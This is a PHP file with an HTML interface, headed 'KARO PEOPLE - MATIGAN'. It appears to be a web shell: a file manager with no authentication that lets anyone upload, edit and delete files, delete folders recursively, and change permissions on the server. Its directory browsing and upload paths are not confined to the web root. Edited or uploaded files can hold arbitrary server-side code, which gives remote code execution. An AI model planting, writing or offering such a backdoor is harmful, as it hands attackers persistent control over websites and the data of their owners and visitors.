<?php
// Base directory configuration (change as needed)
$base_dir = $_SERVER['DOCUMENT_ROOT'];
$directory = isset($_GET['dir']) ? $_GET['dir'] : $base_dir;
$full_path = realpath($directory);

// Security function for path validation
function is_valid_path($path) {
    global $base_dir;
    return strpos(realpath($path), realpath($base_dir)) === 0;
}

// Function to format file size in human-readable form
function format_size($size) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $unit = 0;
    while ($size >= 1024 && $unit < count($units) - 1) {
        $size /= 1024;
        $unit++;
    }
    return round($size, 2) . ' ' . $units[$unit];
}

// Function to display folder permissions
function get_permissions($path) {
    return substr(sprintf('%o', fileperms($path)), -4);
}

// File Upload Feature
if (isset($_FILES['file_to_upload'])) {
    $target_file = $full_path . DIRECTORY_SEPARATOR . basename($_FILES['file_to_upload']['name']);
    if (move_uploaded_file($_FILES['file_to_upload']['tmp_name'], $target_file)) {
        echo "<div class='alert alert-success'>File " . htmlspecialchars(basename($_FILES['file_to_upload']['name'])) . " successfully uploaded.</div>";
    } else {
        echo "<div class='alert alert-danger'>Failed to upload file.</div>";
    }
}

// File Edit Feature
if (isset($_POST['edit_file']) && isset($_POST['file_content'])) {
    $edit_file = $_POST['edit_file'];
    if (is_valid_path($edit_file)) {
        file_put_contents($edit_file, $_POST['file_content']);
        echo "<div class='alert alert-success'>File successfully edited.</div>";
    } else {
        echo "<div class='alert alert-danger'>Invalid file path.</div>";
    }
}

// File Delete Feature
if (isset($_POST['delete_file'])) {
    $delete_file = $_POST['delete_file'];
    if (is_valid_path($delete_file) && is_file($delete_file)) {
        unlink($delete_file);
        echo "<div class='alert alert-success'>File successfully deleted.</div>";
    } else {
        echo "<div class='alert alert-danger'>Failed to delete file.</div>";
    }
}

// Folder Delete Feature
if (isset($_POST['delete_folder'])) {
    $delete_folder = $_POST['delete_folder'];
    if (is_valid_path($delete_folder) && is_dir($delete_folder)) {
        rmdir_recursive($delete_folder);
        echo "<div class='alert alert-success'>Folder successfully deleted.</div>";
    } else {
        echo "<div class='alert alert-danger'>Failed to delete folder.</div>";
    }
}

// Recursive function to delete a folder and its contents
function rmdir_recursive($dir) {
    foreach (scandir($dir) as $file) {
        if ($file !== '.' && $file !== '..') {
            $full_path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($full_path)) {
                rmdir_recursive($full_path);
            } else {
                unlink($full_path);
            }
        }
    }
    rmdir($dir);
}

// Load file content for editing via AJAX
if (isset($_GET['load_file'])) {
    $file_to_load = $_GET['load_file'];
    if (is_valid_path($file_to_load) && is_file($file_to_load)) {
        echo file_get_contents($file_to_load);
    }
    exit;
}

// Handle permissions update
if (isset($_POST['set_permissions'])) {
    $target_path = $_POST['target_path'];
    $permissions = $_POST['permissions'];
    if (is_valid_path($target_path)) {
        chmod($target_path, octdec($permissions));
        echo "<div class='alert alert-success'>Permissions updated to $permissions.</div>";
    } else {
        echo "<div class='alert alert-danger'>Failed to update permissions.</div>";
    }
}

// List Directory Content
$files = scandir($full_path);
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>KARO PEOPLE - MATIGAN</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container mt-5">
    <h1 class="text-center mb-4">KARO PEOPLE - MATIGAN</h1>

    <!-- File Upload Form -->
    <div class="card mb-4">
        <div class="card-header">
            <h2>Upload File</h2>
        </div>
        <div class="card-body">
            <form action="" method="POST" enctype="multipart/form-data" class="form-inline">
                <div class="form-group">
                    <input type="file" name="file_to_upload" class="form-control mb-2 mr-2">
                </div>
                <button type="submit" class="btn btn-primary mb-2">Upload</button>
            </form>
        </div>
    </div>

    <!-- Directory Content -->
    <div class="card">
        <div class="card-header">
            <h2>Directory Content: <?php echo htmlspecialchars($full_path); ?></h2>
        </div>
        <div class="card-body">
            <ul class="list-group">
                <?php foreach ($files as $file): ?>
                    <?php if ($file !== '.' && $file !== '..'): ?>
                        <li class="list-group-item d-flex justify-content-between align-items-center">
                            <?php if (is_dir($full_path . DIRECTORY_SEPARATOR . $file)): ?>
                                <a href="?dir=<?php echo urlencode($full_path . DIRECTORY_SEPARATOR . $file); ?>">
                                    <strong><?php echo htmlspecialchars($file); ?></strong>
                                </a>
                                <form action="" method="POST" style="display: inline;">
                                    <input type="hidden" name="delete_folder" value="<?php echo htmlspecialchars($full_path . DIRECTORY_SEPARATOR . $file); ?>">
                                    <button type="submit" class="btn btn-danger btn-sm">Delete Folder</button>
                                </form>
                            <?php else: ?>
                                <?php echo htmlspecialchars($file); ?> 
                                (<?php echo format_size(filesize($full_path . DIRECTORY_SEPARATOR . $file)); ?>) 
                                <span class="text-muted">(Permissions: <?php echo get_permissions($full_path . DIRECTORY_SEPARATOR . $file); ?>)</span>
                                <div>
                                    <button type="button" class="btn btn-warning btn-sm" onclick="editFile('<?php echo addslashes($full_path . DIRECTORY_SEPARATOR . $file); ?>')">Edit</button>
                                    <form action="" method="POST" style="display: inline;">
                                        <input type="hidden" name="delete_file" value="<?php echo htmlspecialchars($full_path . DIRECTORY_SEPARATOR . $file); ?>">
                                        <button type="submit" class="btn btn-danger btn-sm">Delete</button>
                                    </form>
                                    <form action="" method="POST" style="display: inline;">
                                        <input type="hidden" name="target_path" value="<?php echo htmlspecialchars($full_path . DIRECTORY_SEPARATOR . $file); ?>">
                                        <input type="text" name="permissions" placeholder="0644" class="form-control-sm">
                                        <button type="submit" name="set_permissions" class="btn btn-info btn-sm">Set Permissions</button>
                                    </form>
                                </div>
                            <?php endif; ?>
                        </li>
                    <?php endif; ?>
                <?php endforeach; ?>
            </ul>
        </div>
    </div>
</div>

<!-- Modal for Editing File -->
<div id="editModal" class="modal" tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title">Edit File</h5>
                <button type="button" class="btn-close" onclick="closeModal()"></button>
            </div>
            <div class="modal-body">
                <form action="" method="POST">
                    <input type="hidden" name="edit_file" id="edit_file">
                    <div class="form-group">
                        <textarea name="file_content" id="file_content" rows="10" class="form-control"></textarea>
                    </div>
                    <button type="submit" class="btn btn-primary mt-3">Save Changes</button>
                </form>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-secondary" onclick="closeModal()">Close</button>
            </div>
        </div>
    </div>
</div>

<script>
    function editFile(filePath) {
        document.getElementById('editModal').style.display = 'block';
        document.getElementById('edit_file').value = filePath;

        // Load file content using Ajax
        var xhr = new XMLHttpRequest();
        xhr.open('GET', '?load_file=' + encodeURIComponent(filePath), true);
        xhr.onload = function () {
            if (xhr.status === 200) {
                document.getElementById('file_content').value = xhr.responseText;
            }
        };
        xhr.send();
    }

    function closeModal() {
        document.getElementById('editModal').style.display = 'none';
    }
</script>

<!-- Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"></script>

</body>
</html>
